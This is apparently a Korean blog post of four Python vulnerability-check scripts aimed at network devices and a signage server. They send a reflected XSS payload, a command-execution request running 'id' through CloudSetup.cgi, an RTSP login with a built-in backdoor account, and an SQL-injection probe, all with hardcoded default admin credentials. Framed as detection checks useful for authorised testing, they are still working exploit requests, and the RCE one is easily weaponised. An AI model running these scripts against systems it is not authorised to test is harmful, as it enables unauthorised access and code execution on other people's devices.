Python requests 예제들

JoGeun 2021. 4. 13. 15:03

1. Basic 방식

# -*- coding: cp949 -*-
# CVE : CVE-2015-1437
# Description :
# result_of_get_changed_status.asp의 flag 파라미터에서 스크립트 구문이 동작되어 세션 탈취 등을 할 수 있는 취약점

# 실제 기기 대상

'''
----REQUEST----


----RESPONSE----

'''

import requests
import sys

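def packet(target, port):
    """Check one device for the reflected-script issue tracked as CVE-2015-1437.

    Sends a single GET to result_of_get_changed_status.asp with a marker in
    the ``flag`` parameter and reports whether that marker is returned
    unencoded in the response body.

    Args:
        target: Host name or IP address of the device (string).
        port: TCP port of the web interface (string, as read from argv).

    Returns:
        None. One result line is printed to stdout.
    """
    # Built before the try block so the error path can always print it; the
    # original referenced ``url`` in its handler even when it might be unbound.
    url = 'http://'+target+':'+port+'/result_of_get_changed_status.asp?current_page=&sid_list=LANGUAGE%3B&action_mode=+Apply+&preferred_lang=&flag=initial78846\'%3balert(\'nnormaa\')%2f%2f372137b5d'

    # Login -- default admin/admin, sent as HTTP Basic over plain HTTP, so the
    # credentials are only base64-encoded on the wire.
    headers = {'Authorization' : 'Basic YWRtaW46YWRtaW4='}

    try:
        with requests.Session() as s:
            resp = s.get(url, headers=headers, timeout=3)
    except requests.exceptions.RequestException as exc:
        # A timeout or refused connection says nothing about the device's
        # state, so it is reported as inconclusive rather than "not vulnerable".
        print(url+", Check inconclusive for CVE-2015-1437 (request failed: "+exc.__class__.__name__+")")
        return

    marker_reflected = 'alert(\'nnormaa\')' in resp.text
    if resp.status_code == 200 and marker_reflected:
        # Output spelling ("Vulnarable") is kept as-is for anything parsing it.
        print(url+", Vulnarable CVE-2015-1437")
    else:
        # NOTE(review): any non-200 answer also lands here (for example when
        # the default password has been changed), so this line means
        # "not confirmed", not "patched".
        print(url+", Not Vulnarable CVE-2015-1437")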

# MAIN
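if __name__ == "__main__":
    # Expected invocation: <script> [IP] [PORT], or <script> -usage.
    # Slicing avoids the IndexError the original raised when run without
    # arguments, and ``==`` replaces the identity test ``len(...) is 3``.
    args = sys.argv[1:]
    if args and args[0] == "-usage":
        print("[IP] [PORT]")
    elif len(args) == 2:
        packet(args[0], args[1])
        # NOTE(review): exit status is 1 even after a completed check, so the
        # status cannot be used to tell outcomes apart; kept for compatibility.
        sys.exit(1)
    else:
        sys.exit(1)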

 

 

2. Digest 방식

# -*- coding: cp949 -*-
# CVE : NCVE-2016-0045
# Description :
# cgi-bin/supervisor/CloudSetup.cgi의 exefile 파라미터에서 관리자 권한으로 명령 실행이 가능한 Remote Code Execution(RCE)이 발생하는 취약점

'''
----REQUEST----
GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=id HTTP/1.1

----RESPONSE----
HTTP/1.0 200 OK

uid=0(root) gid=0(root) groups=0(root)
'''

import requests
import sys
from requests.auth import HTTPDigestAuth

# Silence urllib3's InsecureRequestWarning, which is emitted for HTTPS
# requests sent with verify=False (certificate validation disabled).
# NOTE(review): suppressing it removes the only runtime hint that TLS
# certificates are not being checked by this script.
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

#proxies={'http':'http://localhost:8080', 'https':'https://localhost:8080'}
# Packet Request
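def packet(target, port):
    """Check one device for the command-execution issue labelled NCVE-2016-0045.

    Sends a single Digest-authenticated GET to
    cgi-bin/supervisor/CloudSetup.cgi and reports whether the response body
    contains the output of the ``id`` command running as root.

    Args:
        target: Host name or IP address of the device (string).
        port: TCP port of the web interface (string, as read from argv).

    Returns:
        None. One result line is printed to stdout.
    """
    # Built before the try block so the error path can always print it.
    url = "http://"+target+":"+port+"/cgi-bin/supervisor/CloudSetup.cgi?exefile=id"

    try:
        with requests.Session() as s:
            # Default admin/admin credentials, HTTP Digest.
            s.auth = HTTPDigestAuth('admin','admin')
            # The URL is plain HTTP, so verify=False only takes effect if the
            # device redirects to HTTPS; certificates are then not validated.
            resp = s.get(url, timeout=3, verify=False)
    except requests.exceptions.RequestException as exc:
        # A timeout or refused connection says nothing about the device's
        # state, so it is reported as inconclusive rather than "not vulnerable".
        print(url+", Check inconclusive for NCVE-2016-0045 (request failed: "+exc.__class__.__name__+")")
        return

    ran_as_root = 'uid=0(root)' in resp.text
    if resp.status_code == 200 and ran_as_root:
        print(url+", Vulnerable to NCVE-2016-0045")
    else:
        # NOTE(review): any non-200 answer also lands here (for example when
        # the default password has been changed), so this line means
        # "not confirmed", not "patched".
        print(url+", Not Vulnerable to NCVE-2016-0045")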


# MAIN
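if __name__ == "__main__":
    # Expected invocation: <script> [IP] [PORT], or <script> -usage.
    # Slicing avoids the IndexError the original raised when run without
    # arguments, and ``==`` replaces the identity test ``len(...) is 3``.
    args = sys.argv[1:]
    if args and args[0] == "-usage":
        print("[IP] [PORT]")
    elif len(args) == 2:
        packet(args[0], args[1])
        # NOTE(review): exit status is 1 even after a completed check, so the
        # status cannot be used to tell outcomes apart; kept for compatibility.
        sys.exit(1)
    else:
        sys.exit(1)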

 

3. RTSP 방식

# -*- coding: cp949 -*-
# CVE : CVE-2018-10328
# Description :
# RTSP 프로토콜에 접근할 수 있는 appagent/streaming 백도어 계정이 존재하는 취약점

'''
'''

import sys
import cv2
import signal
import socket
import time

def handler(signum, frame):
    """Signal callback that aborts the running operation.

    Both arguments are supplied by the signal machinery and are not used;
    the function always raises ``Exception("end of time")``.
    """
    timeout_message = "end of time"
    raise Exception(timeout_message)


# Packet Request
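def packet(target):
    """Check one device for the built-in RTSP account tracked as CVE-2018-10328.

    First confirms that TCP port 554 accepts a connection, then tries to read
    one frame from the RTSP stream using the appagent/streaming account. A
    frame being returned is reported as vulnerable.

    Args:
        target: Host name or IP address of the device (string).

    Returns:
        None. One result line is printed to stdout.
    """
    url = 'rtsp://appagent:streaming@'+target+':554'
    cap = None
    alarm_armed = False
    previous_handler = None
    try:
        # Reachability probe; the socket is closed even when connect() fails
        # (the original leaked it on that path).
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.settimeout(3)
            s.connect((target,554))
        finally:
            s.close()

        # VideoCapture has no timeout argument here, so SIGALRM bounds the
        # stream open/read to 3 seconds (POSIX only).
        previous_handler = signal.signal(signal.SIGALRM, handler)
        alarm_armed = True
        signal.alarm(3)
        cap = cv2.VideoCapture(url)
        success, _frame = cap.read()
        signal.alarm(0)

        if success:
            print(url+", Vulnerable to CVE-2018-10328")
        else:
            print(url+", Not Vulnerable to CVE-2018-10328")
    except Exception as exc:
        # Connection errors and the 3-second timeout leave the result unknown,
        # so they are reported as inconclusive rather than "not vulnerable".
        # ``except Exception`` (not a bare except) lets Ctrl-C propagate.
        print(url+", Check inconclusive for CVE-2018-10328 ("+exc.__class__.__name__+": "+str(exc)+")")
    finally:
        if alarm_armed:
            # Cancel a still-pending alarm and put the old handler back so a
            # late SIGALRM cannot fire after this function has returned.
            signal.alarm(0)
            if previous_handler is not None:
                signal.signal(signal.SIGALRM, previous_handler)
        if cap is not None:
            cap.release()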
            

# MAIN
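if __name__ == "__main__":
    # Expected invocation: <script> [IP], or <script> -usage.
    # Slicing avoids the IndexError the original raised when run without
    # arguments.
    args = sys.argv[1:]
    if args and args[0] == "-usage":
        print("[IP]")
    elif len(args) == 1:
        packet(args[0])
        # NOTE(review): exit status is 1 even after a completed check, so the
        # status cannot be used to tell outcomes apart; kept for compatibility.
        sys.exit(1)
    else:
        sys.exit(1)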

 

4. POST 방식

# -*- coding: cp949 -*-
# CVE : CVE-2013-4887
# Description :
# index.php의 displayid 파라미터에서 SQLi가 발생하여 데이터베이스에 접근할 수 있는 취약점

# PoC 분석으로 작성
# Reference. http://infosec42.blogspot.com/2013/08/exploit-xibo-digital-signage-sql.html

'''
----REQUEST----
----RESPONSE----
'''

import requests
import sys

# Silence urllib3's InsecureRequestWarning, which is emitted for HTTPS
# requests sent with verify=False (certificate validation disabled).
# NOTE(review): suppressing it removes the only runtime hint that TLS
# certificates are not being checked by this script.
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

#proxies={'http':'http://localhost:8080', 'https':'https://localhost:8080'}
# Packet Request
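def packet(target, port):
    """Check one host for the SQL injection tracked as CVE-2013-4887.

    Picks http or https via Https_Check, then POSTs one report query to
    index.php?ajax=true with a trailing quote in ``displayid`` and reports
    whether the response contains the database error markers.

    Args:
        target: Host name or IP address of the server (string).
        port: TCP port of the web interface (string, as read from argv).

    Returns:
        None. One result line is printed to stdout.
    """
    # Fallback label for the error path in case the URL was never built.
    url = target+":"+port
    data=(
        ('p','report'),
        ('q','LogGrid'),
        ('type','all'),
        ('fromdt','30/08/2020'),
        ('page','All'),
        ('seconds','1000'),
        ('function','All'),
        ('displayid','all\'')
    )
    try:
        with requests.Session() as s:
            https_check = Https_Check(target, port,s)
            url = https_check+"://"+target+":"+port+"/index.php?ajax=true"
            # verify=False: for https targets the certificate is not
            # validated, so the answering host is not authenticated.
            resp = s.post(url, data=data,timeout=3, verify=False)
    except requests.exceptions.RequestException as exc:
        # A timeout or refused connection says nothing about the server's
        # state, so it is reported as inconclusive rather than "not vulnerable".
        print(url+", Check inconclusive for CVE-2013-4887 (request failed: "+exc.__class__.__name__+")")
        return

    # Both markers must be present in a 200 response for a positive result.
    error_markers_present = 'Can not query the log' in resp.text and 'uniqueReference' in resp.text
    if resp.status_code == 200 and error_markers_present:
        print(url+", Vulnerable to CVE-2013-4887")
    else:
        # NOTE(review): a login page, redirect or non-200 answer also lands
        # here, so this line means "not confirmed", not "patched".
        print(url+", Not Vulnerable to CVE-2013-4887")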

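def Https_Check(target, port,s):
    """Guess whether the service on target:port should be reached via https.

    Issues one plain-HTTP GET through the supplied session and maps the
    outcome to a scheme name.

    Args:
        target: Host name or IP address (string).
        port: TCP port (string or int; formatted with %s).
        s: Session-like object exposing ``get(url, **kwargs)``.

    Returns:
        'https' when the response status is 400 or the request fails with a
        requests ConnectionError; 'http' in every other case.
    """
    try:
        # requests applies no timeout by default, so the original call could
        # block indefinitely on a silent host; 3 seconds matches the other
        # requests in this script.
        resp = s.get('http://%s:%s' % (target, port), timeout=3)
    except requests.exceptions.ConnectionError:
        # Presumably a TLS-only port dropping the plain-HTTP request -- a
        # heuristic, since an unreachable host ends up here as well.
        return 'https'
    except Exception:
        # Best effort: any other failure falls back to http. Unlike a bare
        # ``except:``, this lets KeyboardInterrupt/SystemExit propagate.
        return 'http'

    # Presumably the "plain HTTP sent to an HTTPS port" reply; verify per target.
    return 'https' if resp.status_code == 400 else 'http'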



# MAIN
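if __name__ == "__main__":
    # Expected invocation: <script> [IP] [PORT], or <script> -usage.
    # Slicing avoids the IndexError the original raised when run without
    # arguments, and ``==`` replaces the identity test ``len(...) is 3``.
    args = sys.argv[1:]
    if args and args[0] == "-usage":
        print("[IP] [PORT]")
    elif len(args) == 2:
        packet(args[0], args[1])
        # NOTE(review): exit status is 1 even after a completed check, so the
        # status cannot be used to tell outcomes apart; kept for compatibility.
        sys.exit(1)
    else:
        sys.exit(1)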